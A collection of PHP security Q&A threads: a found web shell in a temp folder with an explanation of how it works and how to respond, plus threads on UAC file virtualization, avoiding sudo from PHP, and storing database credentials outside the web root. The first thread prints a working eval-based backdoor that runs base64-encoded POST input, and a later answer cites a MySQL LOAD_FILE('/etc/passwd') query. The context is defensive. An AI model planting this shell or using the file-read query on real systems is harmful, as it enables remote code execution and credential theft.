I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp
Looking into the contents, I find a number followed by some PHP code; the following code appears in several files:
9990000
<?php
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.
Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?
I don't know if it is relevant, but we are running PHP 5.5 on IIS.
Short story: your server may have already been compromised.
Those are PHP shells - mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute any arbitrary code on your server.
The key parts to understanding the shell are:
$xsser=base64_decode($_POST['z0']);
@eval("\$safedg = $xsser;");
It accepts any code at all from a $_POST variable (z0), base64-decodes it, and then runs it through eval(), with the @ operator suppressing any errors.
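To make that concrete, here is a rough sketch of what the shell effectively does with a request (the payload value below is made up for illustration):

<?php
// Illustrative walk-through of the shell's logic with a made-up payload.
$z0 = 'cGhwaW5mbygp';            // attacker posts base64 in $_POST['z0']
$xsser = base64_decode($z0);     // decodes to: phpinfo()
// The shell then runs: @eval("\$safedg = $xsser;");
// i.e. it evaluates  $safedg = phpinfo();  with errors silenced by @,
// so whatever PHP the attacker encoded runs with the web server's privileges.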
It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.
So what to do about it? Check your server logs: if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site and lock them down (require user authentication, etc.). And if you're certain that you're compromised, don't bother trying to clean it; spin up a new server and migrate your clean code, important files, and data to it.
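As a starting point for locking down an upload form, a minimal sketch (the form field name, session check and Windows path are assumptions; adapt them to your own site):

<?php
// Hypothetical hardening of an upload handler.
session_start();
if (empty($_SESSION['user_id'])) {              // require a logged-in user
    header('HTTP/1.1 403 Forbidden');
    exit('Forbidden');
}

$allowed = array('jpg', 'png', 'gif', 'pdf');   // only the types you actually expect
$ext = strtolower(pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowed, true)) {
    exit('File type not allowed');
}

// Store under a generated name, outside the web root, so nothing that was
// uploaded can ever be requested (and executed) as a script.
$dest = 'D:\\uploads\\' . md5(uniqid(mt_rand(), true)) . '.' . $ext;
move_uploaded_file($_FILES['upload']['tmp_name'], $dest);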
Related
I have a REALLY strange thing happening! When I view a file (within the "Program Files (x86)" folder tree) in my file manager it has one content, but when I retrieve it through a PHP CLI script using file_get_contents() it has different content (with some additional lines I added through the script earlier) - unless I run the CLI script in a prompt with admin rights, in which case I see the same content. How on earth can the same file have different content depending on the permissions of the user accessing it? Is that really possible, and if so, where can I find more information on how it works? I've never heard of such a thing in my 25+ years of computing and programming experience...
I have quadruple-checked that the path is the same and checked in all kinds of ways that there isn't something else playing a trick on me - but I just can't find any possible explanation!
I'm running Windows 10.
32-bit applications that do not have a requestedExecutionLevel node in their manifest are assumed to be UAC-unaware and if they try to write to a privileged location in the file system or registry (when the process is not elevated) the write operation is virtualized. Virtualized files are stored in %LocalAppData%\VirtualStore.
Manually delete the file in the VirtualStore and then edit the ACL/security of the real file if you need to write to it from your script as a standard user...
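A quick way to confirm that virtualization is what you are seeing is to look for a VirtualStore copy of the file and compare it with the real one (the application path below is a made-up example):

<?php
// Compare the real file with a possible VirtualStore copy (illustrative paths).
$real    = 'C:\\Program Files (x86)\\MyApp\\settings.ini';
$virtual = getenv('LOCALAPPDATA')
         . '\\VirtualStore\\Program Files (x86)\\MyApp\\settings.ini';

echo "Real path contents:\n" . file_get_contents($real) . "\n";
if (is_file($virtual)) {
    // If this copy exists, your earlier write was virtualized; non-elevated
    // reads of the Program Files path get redirected here.
    echo "VirtualStore copy:\n" . file_get_contents($virtual) . "\n";
}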
I have a script write_get.php that I would like to execute via users remotely loading a web page. This script in turn runs
exec("sudo php save_file.php ".$arg1)
to do some file writing that requires sudo permissions. This works fine when I run write_get.php from the command line on my web server as a non-privileged user, but it doesn't work when I invoke the script by loading it in a web browser. The browser shows the same output, making it appear as though there is no error, but the file that save_file.php is supposed to create never gets created. Everything else that needs to happen (another temp-file creation that doesn't require sudo, plus a database insert) works fine, but everything else is in write_get.php rather than in the sudo-requiring save_file.php.
I assume the server somehow blocks this call to exec("sudo... when it's made remotely? Or if not, what's happening here? Most importantly, how can I work around this?
p.s. I understand there are probably major security concerns here, but please know there is no sensitive data/anything on this server and that the files created in the sudo-requiring script don't even contain user input, so for the moment I am more concerned with trying to do the above than with creating a safer file structure/alternate way of doing this.
What you're trying to do is a bad idea because you would need to give passwordless root access to the Apache user, which is essentially like making the Apache user equal to root. All it would take to gain root access to your server would be to upload a malicious PHP script and have it executed by the Apache user. Instead, just make the files you are writing to writable by the Apache user by executing:
chown -R www-data:www-data /var/www/html
And then instead of doing exec() just include the other PHP file in your main script.
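A minimal sketch of that approach, keeping the file names from the question (the function name, argument source and target path are assumptions):

// write_get.php (sketch) -- instead of exec("sudo php save_file.php ".$arg1):
<?php
require __DIR__ . '/save_file.php';
$arg1 = $_GET['name'];               // hypothetical: however $arg1 was obtained before
save_file($arg1);                    // runs as the web server user; no sudo needed

// save_file.php (sketch) -- the old top-level code wrapped in a function:
<?php
function save_file($arg1) {
    // Writable by www-data once the chown above has been applied.
    file_put_contents('/var/www/html/data/' . basename($arg1) . '.txt', "contents\n");
}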
I was reading some posts about how to include files outside the PHP root (the Apache document root). I guess just reading a file is an easier task and may be done with the same solution. But I do not intend to put PHP or any other script files outside my document root (right now it is /Library/WebServer/Documents/); I wish to keep only one root with the usual configuration.
But any file outside the root is not "visible"; it's as if my whole HD consisted of nothing but the document root. PHP does not return a permissions error, it returns a "file doesn't exist" (or "is not a directory") error. That is good security practice, but it makes my scripts blind! I have a small intranet, and one task I wish to do is read Safari's favorites file (Bookmarks.plist); I also wish to make a photo viewer, etc.
So I just want to read those files. Is there some hack for this?
EDIT: I was using file_get_contents. Following suggestions, I tried include, which stops on permissions issues (probably an owner issue). I did a test with a simple file on a Volume (an external HD) and it included just fine. However, I'm thinking about how to deal with the data, you know - I was expecting to read the XML and work on it...
EDIT 2: file_get_contents is working with a file on an external HD, so the problem seems to be about file permissions/ownership. The info window shows the same users for both files: me, staff and everyone, with at least read permission. Maybe there is some "hidden" user... any hacker around?
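If it helps to narrow this down, here is a small diagnostic sketch that walks the path and reports what the PHP process can actually see (the target path is an assumption):

<?php
// Diagnostic: report permissions along the path as seen by the PHP user.
$target = '/Users/me/Library/Safari/Bookmarks.plist';   // hypothetical path
echo 'Running as: ' . exec('whoami') . "\n";

// Every parent directory needs the execute (search) bit for this user;
// without it, access fails even though the file itself is readable.
$path = $target;
while ($path !== '/' && $path !== '') {
    printf("%-55s exists:%d readable:%d executable:%d\n",
        $path, (int) file_exists($path), (int) is_readable($path), (int) is_executable($path));
    $path = dirname($path);
}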
In a module I'm creating I have some sensitive information I need to store securely: A remote database host, username, and password.
It seems that the only storage available is in the Drupal database, which worries me since this means if Drupal is compromised so is this other database. The settings.php file in sites/all/default was my second option, but I'm having trouble writing to it. Various chmod commands in FTP and SSH to 777 and 666 won't open the file to writing. I'm also not sure if the variables I set there are available anywhere else.
Are there any other ways to store this information securely?
You're on the right track using settings.php. You can use the $conf variable in settings.php to set variables that you can access in modules using variable_get.
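A sketch of what that looks like (the variable name is made up; this assumes Drupal 7-style variable_get()):

<?php
// In settings.php:
$conf['mymodule_remote_db'] = array(
  'host'     => 'db.example.com',
  'username' => 'remote_user',
  'password' => 'secret',
);

// In your module:
$credentials = variable_get('mymodule_remote_db', array());
// $credentials['host'], $credentials['username'], etc. are now available.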
Hmmm... this seems like something you shouldn't do in general. Write an API that sits at the remote database that you can access.
If, however, you insist on direct database access: hard-code the host, username and password in a file, put the file outside your document root, and include it from there. For example, if your document root (i.e. where Drupal's index.php file is) was /www/htdocs, put a file containing the info at something like /www/secure and include it where you need it. Then even if PHP stops working for some reason, the file isn't in a location readable by the outside world, yet PHP can still include it within the site as necessary.
Sure, somebody might see that you were including the file, but they wouldn't be able to see the file itself unless they hacked your server (rather than just Drupal), and in that situation you're pretty much screwed anyway.
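A minimal sketch of that layout (the file name and constant names are made up):

// /www/secure/db-credentials.php  (outside the /www/htdocs document root)
<?php
define('REMOTE_DB_HOST', 'db.example.com');
define('REMOTE_DB_USER', 'remote_user');
define('REMOTE_DB_PASS', 'secret');

// Inside your module, under /www/htdocs:
<?php
require_once '/www/secure/db-credentials.php';
$link = mysqli_connect(REMOTE_DB_HOST, REMOTE_DB_USER, REMOTE_DB_PASS);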
Using a config file is ideal for this type of information. However, doing a chmod 777 or 666 is a really bad idea. The problem is that both of these settings make the file GLOBALLY readable/writable, so if you are on a shared host, it is possible for another user on the system to access your file. On install, try using PHP's chmod() function to do a chmod 500 on the file. (500 should work in most cases; the most important part is that the last digit is zero.)
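For instance, something like this at install time (the path is hypothetical):

<?php
// Run once at install time. Note the leading zero: PHP's chmod() expects an
// octal value, so 0500 (owner read+execute only), not 500.
chmod('/path/to/config.php', 0500);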
I've got a "globabVars.php" doc in my own little framework that contains database connection vars etc... I'm thinking would be neat to store outside of the web facing directories to keep it a little more secure. But, then I was thinking, is it really THAT much more secure? I mean, if someone were able to look at my .php files as a whole (without the server processing them) they would be INSIDE my server looking at all my files anyway...
Thoughts?
Moving a config file outside of the web root can prevent the file from getting leaked if you accidentally misconfigure Apache. For instance, if you remove Apache's mod_php then all .php files will be treated as text files. I have seen config files moved outside of the web root on production systems for this reason, and it did stop the file from getting leaked! (An admin iced the config during an update, d'oh!) Although this doesn't happen very often.
If an attacker can control the path passed to one of these functions: file_get_contents(), fopen(), readfile() or fgets(), then he can read any file on your system. You also have to worry about SQL injection; for instance, under MySQL this query can be used to read files: SELECT LOAD_FILE('/etc/passwd').
To mitigate this issue, remove FILE privileges from the MySQL user account that PHP uses. Also do a chmod -R 500 /path/to/web/root; the last two zeros keep any other account from accessing the files. You should follow that up with a chown -R www-data /path/to/web/root, where www-data is the user account that PHP is executed as; you can figure this out by doing a <?php system('whoami'); ?>.
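When a file path really does have to come from user input, a common defence is to pin it inside a single directory; a rough sketch (the directory and parameter names are made up):

<?php
// Sketch: only serve files that really live inside one allowed directory.
$baseDir   = realpath('/var/www/app/userfiles');          // hypothetical directory
$requested = realpath($baseDir . '/' . basename($_GET['file']));

if ($requested === false || strpos($requested, $baseDir . '/') !== 0) {
    header('HTTP/1.1 404 Not Found');                     // traversal attempt or missing file
    exit;
}

readfile($requested);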
It means no one can access it via a URL by default.
You can hide it with .htaccess if it is in your docroot, but storing it above the docroot is just that bit safer.
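If it does have to stay in the docroot, the .htaccess rule looks something like this (the file name is a placeholder; the Order/Deny syntax is for Apache 2.2, while Apache 2.4 uses "Require all denied" instead):

# .htaccess next to the config file: never serve it over HTTP
<Files "config.php">
    Order allow,deny
    Deny from all
</Files>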
It can still be read via PHP, though, if your application is prone to directory traversal attacks.
Yeah, you are right. There is a very small difference.